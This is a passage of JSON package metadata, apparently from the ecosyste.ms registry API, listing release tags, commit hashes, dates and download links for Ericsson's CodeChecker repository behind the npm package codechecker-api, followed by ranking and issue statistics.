echecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.544Z","dependent_packages_count":1,"downloads":257,"downloads_period":"last-month","dependent_repos_count":9,"rankings":{"downloads":14.047450490637376,"dependent_repos_count":3.8791389085724903,"dependent_packages_count":20.974713837819785,"stargazers_count":1.9822621208138225,"forks_count":1.9680500079986032,"docker_downloads_count":null,"average":8.570323073168415},"purl":"pkg:npm/codechecker-api","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/codechecker-api","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/codechecker-api","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/codechecker-api/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116